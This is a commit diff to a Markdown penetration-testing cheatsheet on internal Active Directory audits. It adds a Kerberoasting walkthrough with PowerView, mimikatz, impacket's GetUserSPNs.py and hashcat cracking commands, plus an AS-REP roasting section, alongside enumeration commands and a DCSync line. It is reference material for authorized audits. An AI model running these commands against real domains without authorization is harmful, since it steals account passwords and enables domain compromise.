added kerberoast description to internal-audits.md

cheatsheets/security/windows/internal-audit.md

@@ -4,18 +4,30 @@ categories: [cheatsheets]
 tags: [windows, security, network, AD]
 ---
 
- Internal Network Audit
+# Internal Network Audit
+
+## ToC
+
+* [Low Hanging Fruits](#low-hanging-fruits)
+    - [AD Enumeration](#ad-enumeration)
+    - [Password spraying](#password-spraying-via-kerberos)
+    - [Bloodhound](#bloodhound)
+* [More Advanced Attacks](#more-advanced-attacks)
+    * [Kerberoasting](#kerberoasting)
+    * [AS-REP Roast](#as-rep-roast)
+    * [NTLM relaying attack](ntlm-relaying-attack)
+
 
 ## Low Hanging Fruits
 
-### AD User Details
+### AD Enumeration
 
 * Get domain password policy
 ```
 net accounts /domain
 ```
 * use PowerView to list domain users with more information
-    - [https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView)
+    - [https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/445f7b2510c4553dcd9451bc4daccb20c8e67cbb/Recon/PowerView.ps1)
     - Admin Account Flag
     - lastlogon
     - badpwdcount
@@ -24,11 +36,11 @@ net accounts /domain
 
 * Get accountname & descriptions (can store interesting information)
 ```
-Get-DomainUser | Select-Object -Properties samaccountname,description
+Get-DomainUser | Select-Object -Property samaccountname,description
 ```
 * Get Accounts sorted by pwdlastset
 ```
-Get-DomainUser -Properties samaccountname,pwdLastSet | where {$_.samaccountname -ne 'DefaultAccount' -AND $_.samaccountname -ne 'Guest'} | sort pwdLastSet | ft -wrap -autosize
+Get-DomainUser -Property samaccountname,pwdLastSet | where {$_.samaccountname -ne 'DefaultAccount' -AND $_.samaccountname -ne 'Guest'} | sort pwdLastSet | ft -wrap -autosize
 ```
 
 ### Password Spraying via Kerberos
@@ -171,8 +183,94 @@ lsadump::dcsync /domain:<domain> /all /csv
 
 ### Kerberoasting
 
+#### Background (Kerberos TGT and TGS)
+
+1. A attacker authenticates to a domain and gets a ticket-granting-ticket (TGT) from the domain controller that’s used for later ticket requests.
+2. The attacker uses their TGT to issue a service ticket request (TGS-REQ) for a particular servicePrincipalName (SPN) of the form sname/host, e.g. MSSqlSvc/SQL.domain.com. This SPN should be unique in the domain, and is registered in the servicePrincipalName field of a user or computer account. During this request process, the attacker can specify what Kerberos encryption types they support (RC4_HMAC, AES256_CTS_HMAC_SHA1_96, etc).
+3. If the attacker’s TGT is valid, the DC extracts information from the TGT stuffs it into a service ticket. Then the domain controller looks up which account has the requested SPN registered in its servicePrincipalName field. The service ticket is encrypted with the hash of the account with the requested SPN registered, using the highest level encryption key that both the attacker and the service account support. The ticket is sent back to the attacker in a service ticket reply (TGS-REP).
+4. The attacker extracts the encrypted service ticket from the TGS-REP. Since the service ticket was encrypted with the hash of the account linked to the requested SPN, the attacker can crack this encrypted blob offline to recover the account’s plaintext password.
+
+#### Attack
+
+There are two common approaches:
+
+1) From an Domain-Joined Windows host:
+
+* Get all possible SPN's with PowerViews `Get-DomainUser` function:
+
+```
+PS> Get-DomainUser -SPN
+```
+
+* For all possible SPN's request tickets with powershell and extract them from memory with `mimikatz`:
+
+```
+PS C:\> Add-Type -AssemblyName System.IdentityModel
+PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
+PS C:\> klist
+<tickets>
+```
+* Extract with Mimikatz:
+
+```
+mimikatz # kerberos::list /export
+```
+
+2) Using a custom implementation of the kerberos protocol
+
+This can be done with `impacket`s `GetUserSPNs.py` tool:
+
+```
+sh> GetUserSPNs.py -request -dc-ip <domain-controller-ip> <domain/user>
+```
+
+3) PowerViews `Invoke-Kerberoast`
+
+This modules does everything automated and outputs the hashes fitting for `john the ripper` and `hashcat`:
+
+```
+PS> Invoke-Kerberoast
+```
+
+The hashes can then be cracked with `john the ripper`, `hashcat`, or `tgsrepcrack`.
+
+If the hashes were extracted with `mimikatz`, the '\*.kirbi' files can be converted to john/hashcat compatible hashes with the tool `kirbi2john`.
+
+* With john:
+
+```
+sh> john hashes.txt
+```
+
+* With hashcat
+
+```
+sh> hashcat -m 13100 -a 0 hashes.txt /path/to/wordlist.txt
+```
+
+#### References:
+
+* [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
+* [https://www.harmj0y.net/blog/redteaming/kerberoasting-revisited/](https://www.harmj0y.net/blog/redteaming/kerberoasting-revisited/)
+
+
 ### AS-REP Roast
 
+If user-accounts in the AD dont have the `DONT_REQ_OREAUTH` set, aka dont require kerberos preauthentication,
+a piece of encrypted information can be requested that can be used to offline bruteforce the password of this user account.
+
+To find such user accounts, the following `PowerView` command can be used:
+
+```
+PS> Get-DomainUser -PreauthNotRequired
+```
+
+#### References:
+
+* [https://www.harmj0y.net/\blog/activedirectory/roasting-as-reps/](https://www.harmj0y.net/\blog/activedirectory/roasting-as-reps/)
+* [https://github.com/HarmJ0y/ASREPRoast](https://github.com/HarmJ0y/ASREPRoast)
+
+
 ### NTLM relaying attack